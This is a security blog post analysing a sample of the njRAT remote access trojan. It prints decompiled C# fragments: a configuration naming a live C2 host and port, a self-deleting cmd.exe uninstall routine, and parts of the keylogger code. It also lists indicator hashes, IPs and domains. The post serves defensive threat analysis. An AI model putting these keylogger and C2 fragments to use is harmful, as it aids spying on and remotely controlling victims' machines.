<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="day-prompt" content="days ago"><meta name="hour-prompt" content="hours ago"><meta name="minute-prompt" content="minutes ago"><meta name="justnow-prompt" content="just now"><meta name="generator" content="Jekyll v4.2.1" /><meta property="og:title" content="njRAT" /><meta property="og:locale" content="en" /><meta name="description" content="njRAT (aka Bladabindi, Njw0rm, LV) is a Remote Access Trojan (RAT) built on the .NET framework and targetted for Windows machines. It started appearing in 2012 and has recently become trending on the any.run trend page after RedLine Stealer. Links to the articles used are in the References section." /><meta property="og:description" content="njRAT (aka Bladabindi, Njw0rm, LV) is a Remote Access Trojan (RAT) built on the .NET framework and targetted for Windows machines. It started appearing in 2012 and has recently become trending on the any.run trend page after RedLine Stealer. Links to the articles used are in the References section." /><link rel="canonical" href="https://marwannour.github.io/Cyber-Blog/posts/NJRAT/" /><meta property="og:url" content="https://marwannour.github.io/Cyber-Blog/posts/NJRAT/" /><meta property="og:site_name" content="Cyber Blog" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-02-09T22:21:00+01:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="njRAT" /><meta name="twitter:site" content="@__M4rwan" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"headline":"njRAT","dateModified":"2022-02-13T23:18:02+01:00","datePublished":"2022-02-09T22:21:00+01:00","description":"njRAT (aka Bladabindi, Njw0rm, LV) is a Remote Access Trojan (RAT) built on the .NET framework and targetted for Windows machines. It started appearing in 2012 and has recently become trending on the any.run trend page after RedLine Stealer. Links to the articles used are in the References section.","url":"https://marwannour.github.io/Cyber-Blog/posts/NJRAT/","mainEntityOfPage":{"@type":"WebPage","@id":"https://marwannour.github.io/Cyber-Blog/posts/NJRAT/"},"@type":"BlogPosting","@context":"https://schema.org"}</script><title>njRAT | Cyber Blog</title><link rel="apple-touch-icon" sizes="180x180" href="/Cyber-Blog/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/Cyber-Blog/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/Cyber-Blog/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/Cyber-Blog/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/Cyber-Blog/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Cyber Blog"><meta name="application-name" content="Cyber Blog"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/Cyber-Blog/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/Cyber-Blog/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end" lang="en"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/Cyber-Blog/" alt="avatar" class="mx-auto"> <img src="/Cyber-Blog/assets/img/terminal-icon.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/Cyber-Blog/">Cyber Blog</a></div><div class="site-subtitle font-italic">Cybersecurity related blogposts</div></div><ul class="w-100"><li class="nav-item"> <a href="/Cyber-Blog/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/Cyber-Blog/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/Cyber-Blog/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/Cyber-Blog/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/Cyber-Blog/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a><li class="nav-item"> <a href="/Cyber-Blog/disclaimer/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>DISCLAIMER</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/MarwanNour" aria-label="github" class="order-3" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/__M4rwan" aria-label="twitter" class="order-4" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href="/Cyber-Blog/feed.xml" aria-label="rss" class="order-5" > <i class="fas fa-rss"></i> </a> <a href="https://www.linkedin.com/in/marwannour/" aria-label="linkedin" class="order-6" target="_blank" rel="noopener"> <i class="fab fa-linkedin"></i> </a> <span class="icon-border order-2"></span> <span id="mode-toggle-wrapper" class="order-1"> <i class="mode-toggle fas fa-adjust"></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.updateMermaid(); }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer) ) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } updateMermaid() { if (typeof mermaid !== "undefined") { let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default"); let config = { theme: expectedTheme }; /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */ $(".mermaid").each(function() { let svgCode = $(this).prev().children().html(); $(this).removeAttr("data-processed"); $(this).html(svgCode); }); mermaid.initialize(config); mermaid.init(undefined, ".mermaid"); } } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } this.updateMermaid(); } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/Cyber-Blog/"> Home </a> </span> <span>njRAT</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>njRAT</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="semi-bold"> Marwan Nour </span> on <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Wed, Feb 9, 2022, 10:21 PM +0100" >Feb 9, 2022<i class="unloaded">2022-02-09T22:21:00+01:00</i> </span></div><div> <span> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Sun, Feb 13, 2022, 11:18 PM +0100" >Feb 13, 2022<i class="unloaded">2022-02-13T23:18:02+01:00</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="909 words">5 min read</span></div></div><div class="post-content"><p>njRAT (aka Bladabindi, Njw0rm, LV) is a Remote Access Trojan (RAT) built on the .NET framework and targetted for Windows machines. It started appearing in 2012 and has recently become trending on the any.run trend page after RedLine Stealer. Links to the articles used are in the <a href="#references">References</a> section.</p><h2 id="overview">Overview</h2><p>As you can probably tell from its name, njRAT is indeed a RAT which allows an attacker to gain full remote access to a victim’s machine. Apparently it has several “editions” (danger, golden, green, lime):</p><p><img data-proofer-ignore data-src="../../assets/img/njrat/editions.PNG" alt="njRAT Editions" /> <em>Figure 1: njRAT editions</em></p><p>And perhaps even more editions/versions as it is still being used to this day.</p><h2 id="distribution">Distribution</h2><p>njRAT is often dropped as an email attachement. Some versions of this trojan are able to spread through external hard drives by copying themselves on to the connected drives.</p><h2 id="decompilation--behavior">Decompilation &amp; Behavior</h2><p>I decided to load up an njRAT (Lime Edition) sample in ILSpy inside an isolated Win10 VM. Luckily the njRAT sample I was using was very not obfuscated which made the reversing part much easier.</p><p>There were quite a few strings that looked really suspicious especially since they were related to gathering information from the infected machine:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span text-data=" Plaintext "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre>get_Name
get_OSFullName
get_FullName
get_UserName
get_ProcessName
get_Jpeg
get_CapsLock
SearchForCam
CopyFromScreen
get_PrimaryScreen
GetVolumeInformation
get_CtrlKeyDown
get_ShiftKeyDown
Keylogger
DeleteValueFromRegistry
GetValueFromRegistry
SaveValueOnRegistery
</pre></table></code></div></div><p>I found part of a cmd command in the <code class="language-plaintext highlighter-rouge">UserString Heap</code> section:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span text-data=" Plaintext "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cmd.exe /C Y /N /D Y /T1 &amp; Del "
</pre></table></code></div></div><p>and also the website: <code class="language-plaintext highlighter-rouge">musicnote.soundcast.me</code>.</p><p>What’s also interesting is that <code class="language-plaintext highlighter-rouge">avicap32.dll</code> is used. Apparently this dll would normally be used to capture videos from camera through Windows API.</p><p>I decompiled two files <code class="language-plaintext highlighter-rouge">Lime.Program.cs</code> and <code class="language-plaintext highlighter-rouge">Lime.Keylogger.cs</code> which I will go through. I’ll start with <code class="language-plaintext highlighter-rouge">Lime.Program.cs</code> because it contains the entry point (main function) to the malware.</p><h3 id="limeprogramcs-findings">Lime.Program.cs findings</h3><p><strong>Global Variables</strong></p><p>For starters, we find interesting static global variables in this program:</p><div class="language-cs highlighter-rouge"><div class="code-header"> <span text-data=" C# "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre><span class="k">public</span> <span class="k">static</span> <span class="kt">string</span> <span class="n">host</span> <span class="p">=</span> <span class="s">"musicnote.soundcast.me"</span><span class="p">;</span>
<span class="k">public</span> <span class="k">static</span> <span class="kt">string</span> <span class="n">port</span> <span class="p">=</span> <span class="s">"91"</span><span class="p">;</span>
<span class="k">public</span> <span class="k">static</span> <span class="kt">string</span> <span class="n">registryName</span> <span class="p">=</span> <span class="s">"88169db1610442f489"</span><span class="p">;</span>
<span class="k">public</span> <span class="k">static</span> <span class="kt">string</span> <span class="n">splitter</span> <span class="p">=</span> <span class="s">"@!#&amp;^%$"</span><span class="p">;</span>
<span class="k">public</span> <span class="k">static</span> <span class="kt">string</span> <span class="n">victimName</span> <span class="p">=</span> <span class="s">"SEVYWE9FUlJS"</span><span class="p">;</span>
<span class="k">public</span> <span class="k">static</span> <span class="kt">string</span> <span class="n">version</span> <span class="p">=</span> <span class="s">"0.7NC"</span><span class="p">;</span>
<span class="k">public</span> <span class="k">static</span> <span class="n">Mutex</span> <span class="n">stubMutex</span> <span class="p">=</span> <span class="k">null</span><span class="p">;</span>
<span class="k">public</span> <span class="k">static</span> <span class="n">FileInfo</span> <span class="n">currentAssemblyFileInfo</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">FileInfo</span><span class="p">(</span><span class="n">Application</span><span class="p">.</span><span class="n">ExecutablePath</span><span class="p">);</span>
<span class="k">public</span> <span class="k">static</span> <span class="n">Keylogger</span> <span class="n">keylogger</span> <span class="p">=</span> <span class="k">null</span><span class="p">;</span>
<span class="k">public</span> <span class="k">static</span> <span class="kt">bool</span> <span class="n">isConnected</span> <span class="p">=</span> <span class="k">false</span><span class="p">;</span>
<span class="k">public</span> <span class="k">static</span> <span class="n">TcpClient</span> <span class="n">tcpSocket</span> <span class="p">=</span> <span class="k">null</span><span class="p">;</span>
<span class="k">private</span> <span class="k">static</span> <span class="n">MemoryStream</span> <span class="n">memoryStream</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">MemoryStream</span><span class="p">();</span>
<span class="k">private</span> <span class="k">static</span> <span class="kt">byte</span><span class="p">[]</span> <span class="n">bytesArray</span> <span class="p">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="p">[</span><span class="m">5121</span><span class="p">];</span>
<span class="k">private</span> <span class="k">static</span> <span class="kt">string</span> <span class="n">lastCapturedImage</span> <span class="p">=</span> <span class="s">""</span><span class="p">;</span>
<span class="k">public</span> <span class="k">static</span> <span class="kt">object</span> <span class="n">currentPlugin</span> <span class="p">=</span> <span class="k">null</span><span class="p">;</span>

<span class="p">[</span><span class="n">CompilerGenerated</span><span class="p">]</span>
<span class="k">private</span> <span class="k">static</span> <span class="n">ParameterizedThreadStart</span> <span class="n">_003C_003E9__CachedAnonymousMethodDelegate1</span><span class="p">;</span>
</pre></table></code></div></div><p>We have information related to the host domain, the port number, the registry name, the victim name, and objects such as <code class="language-plaintext highlighter-rouge">Keylogger</code>, <code class="language-plaintext highlighter-rouge">TcpClient</code>, <code class="language-plaintext highlighter-rouge">Mutex</code>, etc.</p><p><strong>Entry Point</strong></p><p>The main function calls on <code class="language-plaintext highlighter-rouge">Start()</code> which behaves as follows:</p><ul><li>Creates a registry entry<li>Creates two threads: First thread calls on <code class="language-plaintext highlighter-rouge">Receive</code> while the second thread calls on the keylogger function <code class="language-plaintext highlighter-rouge">keylogger.WRK</code> which starts logging the keystrokes<li>Sends the foreground window title to the C2</ul><p><strong>Cleanup</strong></p><p>This njRAT sample actually has an unistall function that removes itself from the victim’s machine.</p><div class="language-cs highlighter-rouge"><div class="code-header"> <span text-data=" C# "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre><span class="k">public</span> <span class="k">static</span> <span class="k">void</span> <span class="nf">Uninstall</span><span class="p">()</span>
<span class="p">{</span>
	<span class="k">try</span>
	<span class="p">{</span>
		<span class="n">Registry</span><span class="p">.</span><span class="n">CurrentUser</span><span class="p">.</span><span class="nf">OpenSubKey</span><span class="p">(</span><span class="s">"Software"</span><span class="p">,</span> <span class="n">writable</span><span class="p">:</span> <span class="k">true</span><span class="p">).</span><span class="nf">DeleteSubKeyTree</span><span class="p">(</span><span class="n">registryName</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="k">catch</span><span class="p">{}</span>
	<span class="k">try</span>
	<span class="p">{</span>
		<span class="n">Interaction</span><span class="p">.</span><span class="nf">Shell</span><span class="p">(</span><span class="s">"cmd.exe /C Y /N /D Y /T 1 &amp; Del \""</span> <span class="p">+</span> <span class="n">currentAssemblyFileInfo</span><span class="p">.</span><span class="n">FullName</span> <span class="p">+</span> <span class="s">"\""</span><span class="p">,</span> <span class="p">(</span><span class="n">AppWinStyle</span><span class="p">)</span><span class="m">0</span><span class="p">,</span> <span class="k">false</span><span class="p">,</span> <span class="p">-</span><span class="m">1</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="k">catch</span><span class="p">{}</span>
	<span class="k">try</span>
	<span class="p">{</span>
		<span class="n">stubMutex</span><span class="p">.</span><span class="nf">Close</span><span class="p">();</span>
	<span class="p">}</span>
	<span class="k">catch</span><span class="p">{}</span>
	<span class="n">Environment</span><span class="p">.</span><span class="nf">Exit</span><span class="p">(</span><span class="m">0</span><span class="p">);</span>
<span class="p">}</span>
</pre></table></code></div></div><h3 id="limekeyloggercs">Lime.Keylogger.cs</h3><p>The keylogger code is fairly simple:</p><ul><li>The characters logged are encoded into unicode (I guess to support different keyboard languages).<li>It checks if caps lock and shift key are active at the same time (interesting but kind of expected).<li>Has a typo <code class="language-plaintext highlighter-rouge">[TAP]</code> instead of <code class="language-plaintext highlighter-rouge">[TAB]</code> (just funny)</ul><div class="language-cs highlighter-rouge"><div class="code-header"> <span text-data=" C# "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre><td class="rouge-code"><pre><span class="k">private</span> <span class="kt">string</span> <span class="nf">Fix</span><span class="p">(</span><span class="n">Keys</span> <span class="n">k</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">bool</span> <span class="n">flag</span> <span class="p">=</span> <span class="n">keyboard</span><span class="p">.</span><span class="nf">get_ShiftKeyDown</span><span class="p">();</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">keyboard</span><span class="p">.</span><span class="nf">get_CapsLock</span><span class="p">())</span>
	<span class="p">{</span>
		<span class="c1">// caps lock nullifies the shift key</span>
		<span class="n">flag</span> <span class="p">=</span> <span class="p">((!</span><span class="n">flag</span><span class="p">)</span> <span class="p">?</span> <span class="k">true</span> <span class="p">:</span> <span class="k">false</span><span class="p">);</span>
	<span class="p">}</span>

<span class="c1">// &lt;-- trimmed --&gt;</span>
		<span class="k">switch</span> <span class="p">(</span><span class="n">k</span><span class="p">)</span>
		<span class="p">{</span>
		<span class="k">case</span> <span class="n">Keys</span><span class="p">.</span><span class="n">Return</span><span class="p">:</span>
			<span class="k">break</span><span class="p">;</span>
		<span class="k">case</span> <span class="n">Keys</span><span class="p">.</span><span class="n">Tab</span><span class="p">:</span>
			<span class="k">return</span> <span class="s">"[TAP]\r\n"</span><span class="p">;</span>
		<span class="k">default</span><span class="p">:</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">flag</span><span class="p">)</span>
			<span class="p">{</span>
				<span class="k">return</span> <span class="nf">VKCodeToUnicode</span><span class="p">((</span><span class="kt">uint</span><span class="p">)</span><span class="n">k</span><span class="p">).</span><span class="nf">ToUpper</span><span class="p">();</span>
			<span class="p">}</span>
			<span class="k">return</span> <span class="nf">VKCodeToUnicode</span><span class="p">((</span><span class="kt">uint</span><span class="p">)</span><span class="n">k</span><span class="p">);</span>
		<span class="p">}</span>
</pre></table></code></div></div><ul><li>Logs the keys with the date, the process name and the process title</ul><div class="language-cs highlighter-rouge"><div class="code-header"> <span text-data=" C# "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="n">Logs</span> <span class="p">+=</span> <span class="s">"\r\n\u0001"</span> <span class="p">+</span> <span class="n">DateAndTime</span><span class="p">.</span><span class="nf">get_Now</span><span class="p">().</span><span class="nf">ToString</span><span class="p">(</span><span class="s">"yy/MM/dd "</span><span class="p">)</span> <span class="p">+</span> <span class="n">processById</span><span class="p">.</span><span class="n">ProcessName</span> <span class="p">+</span> <span class="s">" "</span> <span class="p">+</span> <span class="n">processById</span><span class="p">.</span><span class="n">MainWindowTitle</span> <span class="p">+</span> <span class="s">"\u0001\r\n"</span><span class="p">;</span>
</pre></table></code></div></div><h2 id="conclusion--mitre-attck-matrix">Conclusion &amp; MITRE ATT&amp;CK Matrix</h2><p>Since njRAT has been out for almost over a decade now, it is usually spotted by Windows Defender and other AVs. The fact that it is still being used out there is because it is being constantly updated to evade detection. Furthermore, it is also possible to detect the malware by monitoring network traffic as it tries to send user info to the C2 server.</p><p>There exists a well documented entry for njRAT on the MITRE ATT&amp;CK website which you can find in the links below:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span text-data=" Plaintext "><i class="fa-fw fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>https://attack.mitre.org/software/S0385/
https://mitre-attack.github.io/attack-navigator//#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0385%2FS0385-enterprise-layer.json
</pre></table></code></div></div><h2 id="iocs">IOCs</h2><p>Hashes:</p><ul><li>76B5F9AA537F6D48961C685FF3E10C6B754218198ED2700CF256FCC64F1ADF9C<li>AED8D380683187C2DABB790C84AB0FEC48F06D0849E23645520AC62EF89569E2<li>2b2b971a07eb7459a7899342dc113638d8ec5caf364bbfbfd434191f7d889d8c<li>3623db8890450965c2f81be1e1035d62ddb6714fa811788198fe3f4f91d47a4a<li>f4a05645f2b4968db97ae260b8bdf441b114c9b7c50d06a931e162bdbc5a38f0<li>0e97651fb888abd6b54b84f8c45b740e5e060091ca9035d507d49518e29b246b<li>db0dda1d32c52f3e4b2dafb4f815a0791b2336f2212c6bc5c3e9ae4ace3d934d<li>bbb446074a8bc7bfd37af136e9d7b0f7508ce21b21e371a91afb55881fa689f0<li>e47c0b614d0c4f9614a176a83c80b760e495fd8d197b7adb613951e89adb47d0<li>72a2e61f62c90994278d4d356156a04b85f00eb5745c6e231cb0a36045d8f370<li>367f1670b9e3eefb9c13cc5886b85b495a88c218cdb1d7b953073c396a85532b<li>1ccc4e0fdb2e471a5c8e36d4cfae746d325b25116ae86eae817683aba141d7ef<li>341d91df0e2f9c5a83b38991eacc78730324a0a6b5467d8dcfe333628f65a1ab<li>a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838<li>77b23820d1202a35dc4552f68a54c401cf49aa347e9fc0233e51fdfe433b8348<li>2537f94e1c1b632bfee7ca9e7177ad9f25fedee9d39b26f85faa67eae237d13d<li>c09779db8d24ec638dac307df49e7d1819433b406731fe501b65eecd560d033b<li>e7d784c671c8f62c542fdbe2f87a27983922a05f508a72855ad53bd249b261e9<li>b3f5e748c31dd8024183b04250c42f384fb2759ab41a483b5812e85e8728ebc3<li>34c716c30b7569beb2fa617b2ab0395d4861428250a3b14e03ada22e831d1144<li>a1c54946f80c7fa92d1b8ae08aca08808e9564dda6c2d38372389491d9f6d69f<li>8f672d868bc0b42c368a067f7bd31e7cc91c70b8986720edacdaa5c0256d2203</ul><p>IP addresses:</p><ul><li>186.169.54.67<li>181.141.0.235<li>46.246.86.11<li>194.5.98.12<li>91.109.178.6<li>104.22.48.74<li>80.241.222.33<li>3.142.167.54<li>91.246.115.86<li>192.169.69.25<li>3.19.130.43<li>37.252.7.150<li>193.161.193.99<li>82.202.167.58<li>3.141.177.1<li>164.68.120.78<li>3.131.207.170<li>3.22.30.40<li>3.17.7.232<li>3.14.182.203</ul><p>Domains:</p><ul><li>jimdo-dolphin-static-assets-prod.freetls.fastly.net<li>wins10.duckdns.org<li>majul.com<li>hjgjkghkjgfu.duckdns.org<li>wrytrioag.duckdns.org<li>bngeyur.duckdns.org<li>fgfdshrt.duckdns.org<li>reald27.duckdns.org<li>m3z0f.ddns.net<li>mnzhvu5b5dramvakbcujh36aymg.anondns.net<li>lorixo666.sytes.net<li>leenux.freemyip.com<li>milla.publicvm.com<li>192-168-100-240.otmn.direct.quickconnect.to<li>192-168-100-240.otmn.direct.quickconnect.to<li>static.leadpages.net<li>visitor.reactful.com<li>njxyro.ddns.net<li>chidonsky.linkpc.net<li>bobby123.ddns.net</ul><h2 id="references">References</h2><ul><li>https://blogs.vmware.com/security/2019/12/threat-analysis-unit-tau-threat-intelligence-notification-njrat.html<li>https://getskout.com/cybersecurity-threat-advisory-0001-22-continued-log4j-scanning-activity/<li>https://blogs.blackberry.com/en/2021/08/threat-thursday-dont-let-njrat-take-your-cheddar<li>https://www.bleepingcomputer.com/news/security/youtube-bitcoin-scams-pushing-the-njrat-backdoor-infostealer/<li>https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html<li>https://www.proofpoint.com/us/threat-reference/remote-access-trojan<li>https://attack.mitre.org/software/S0385/<li>https://any.run/malware-trends/njrat<li>https://www.joesandbox.com/analysis/250899/0/lighthtml<li>https://www.threatminer.org/_reports/2013/fta-1009—njrat-uncovered-1.pdf</ul></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/Cyber-Blog/categories/threat-intel/'>Threat Intel</a>, <a href='/Cyber-Blog/categories/rat/'>RAT</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/Cyber-Blog/tags/malware/" class="post-tag no-text-decoration" >malware</a> <a href="/Cyber-Blog/tags/windows/" class="post-tag no-text-decoration" >windows</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=njRAT - Cyber Blog&url=https://marwannour.github.io/Cyber-Blog/posts/NJRAT/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://telegram.me/share?text=njRAT - Cyber Blog&url=https://marwannour.github.io/Cyber-Blog/posts/NJRAT/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https://marwannour.github.io/Cyber-Blog/posts/NJRAT/" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin"> <i class="fa-fw fab fa-linkedin"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/Cyber-Blog/posts/DLLHijacking/">Hijacking DLLs</a><li><a href="/Cyber-Blog/posts/CAINELabSetup/">Forensics Virtual Lab with CAINE</a><li><a href="/Cyber-Blog/posts/NJRAT/">njRAT</a><li><a href="/Cyber-Blog/posts/MalwareLabSetup/">Malware Analysis Lab Setup</a><li><a href="/Cyber-Blog/posts/RedLineStealer/">RedLine Stealer</a></ul></div><div id="access-tags"> <span>Trending 